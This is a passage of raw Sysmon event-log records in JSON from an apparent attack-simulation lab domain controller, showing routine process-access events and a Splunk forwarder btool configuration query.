C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2895,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2896,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-00104D030500}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-00104D030500}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2897,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.534\r\nProcessGuid: {A837DB8D-0236-5F25-0000-001009040500}\r\nProcessId: 644\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-0236-5F25-0000-00104D030500}\r\nParentProcessId: 2540\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.534","ProcessGuid":"{A837DB8D-0236-5F25-0000-001009040500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-0236-5F25-0000-00104D030500}","ParentProcessId":"2540","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2898,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-00104D030500}\r\nSourceProcessId: 2540\r\nSourceThreadId: 672\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-001009040500}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-00104D030500}","SourceProcessId":"2540","SourceThreadId":"672","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-001009040500}","TargetProcessId":"644","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2899,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-001009040500}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-001009040500}","TargetProcessId":"644","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2900,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2901,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2902,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2903,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 